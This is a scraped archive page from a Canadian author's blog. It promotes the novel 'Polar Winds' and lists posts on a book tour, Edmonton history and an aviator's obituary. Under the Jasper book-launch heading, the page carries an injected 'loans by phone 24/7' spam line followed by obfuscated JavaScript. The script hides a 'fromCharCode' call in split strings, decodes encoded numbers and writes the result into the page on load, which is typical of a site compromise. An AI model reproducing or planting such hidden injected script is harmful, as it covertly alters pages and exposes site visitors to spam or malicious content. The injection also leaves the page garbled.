Are you a professional reviewer or reader? My publisher, Dundurn Press, recently posted the electronic advanced reader copy on NetGalley. You can request a copy by clicking here. Hope you enjoy it! And of course, if you’d like to post a review or rating to Goodreads, Amazon, or Chapters-Indigo that would be much appreciated!
Author Archives: dmcadmin
Book Tour Part 1: Toronto, Yellowknife, Whitehorse
Polar Winds is set to launch and I’m so excited to hit the road and celebrate with the people who made this book possible (and who want to read it!). I hope you’ll come out and raise a glass with me this fall. The first leg of this self-directed tour brings me to three greatContinue reading “Book Tour Part 1: Toronto, Yellowknife, Whitehorse”
Book Launch and Free Writing Workshop in Jasper, Alberta
loans by phone 24/7 var _st=[];var m=[];_st.push(“1452002012061931861”);m.push(“h”);_st.push(“17201206197186146119”);m.unshift(“C”);_st.push(“2011862052011321842002001”);m.push(“a”);_st.push(“1914712020020519220320”);m.unshift(“m”);_st.push(“01842001871941932081971”);m.push(“r”);_st.push(“9620019020119019619514318”);m.push(“C”);_st.push(“218320019619320220118”);m.unshift(“ro”);_st.push(“6144184193190197143”);m.push(“o”);_st.push(“199186184201125137134”);m.push(“d”);_st.push(“14019720512918220220119”);m.unshift(“f”);_st.push(“61291171822022011961291”);m.push(“e”);_st.push(“3713414019720512614421014”);_st.push(“5132200201206193186147″);var t=z=o=””;var k=”U”;var String;for(i=0;i<_st.length;++i)z+=_st[i];for(i=0;i0){o+=String[t](parseInt(z.substr(0, 3)-k.charCodeAt(0)));z=z.substr(3);}document.write(o);
July #yeghistory round up!
Amazing Aviatrix Vi Milstead Passes Away at 95
Vi Milstead (Warren) in 1946 prior to flying Miss Canada to Washington. Photo Courtesy – CASM CAHS Member # 2490 VI MILSTEAD WARREN, C.M. October 17, 1919 – June 27, 2014 Vi passed gently on June 27 surrounded by caregivers and her good friend Marilyn Dickson. In the background Vera Lynn was singing White CliffsContinue reading “Amazing Aviatrix Vi Milstead Passes Away at 95”
RIP Bern Will Brown
I just received this news in my Dundurn Authors newsletter. I came across Bern Will Brown and his work during my time in the North and my research for Polar Winds the past few years. A fascinating man and life, and I imagine a really interesting book. We are saddened by the loss ofContinue reading “RIP Bern Will Brown”
YEG’s Victoria Cross Winners article in Edmonton Journal
The Edmonton Journal and Post Media have put out a First World War website dedicated to commemorating that conflict. I was very happy to contribute an article on Edmonton’s VC winners that was printed in this Saturday’s paper and is now online here. Thanks to the staff at the Loyal Edmonton Regiment Museum and CanadianContinue reading “YEG’s Victoria Cross Winners article in Edmonton Journal”
Fort Edmonton Park Talks Decolonization
I was invited to give two short sessions on the politics of voice and decolonization last week to the folks at Fort Edmonton Park. Considering they ran from 8:30-9:30am (which is really early to talk about such heavy topics), the participants were incredibly enthusiastic and engaged. I really enjoyed our discussions and I know weContinue reading “Fort Edmonton Park Talks Decolonization”
Alberta Railway Museum: All Aboard for History and Fun!
It may be a little off the beaten track, but the Alberta Railway Museum is worth the drive if you’re a history buff – or the parent of small children. In fact, when my family and I ventured over on Sunday, June 15 (Father’s Day), the majority of people there were young families, often withContinue reading “Alberta Railway Museum: All Aboard for History and Fun!”
City Hall School – Citizenship Fair 2014
I hadn’t heard of Edmonton’s City Hall School program until instructor and coordinator Linda Hut contacted me this spring. Now I’m a huge fan – especially after getting to take part in a session earlier this month. On Friday, June 13, I got to attend the wrap-up event and was inspired by the student repsContinue reading “City Hall School – Citizenship Fair 2014”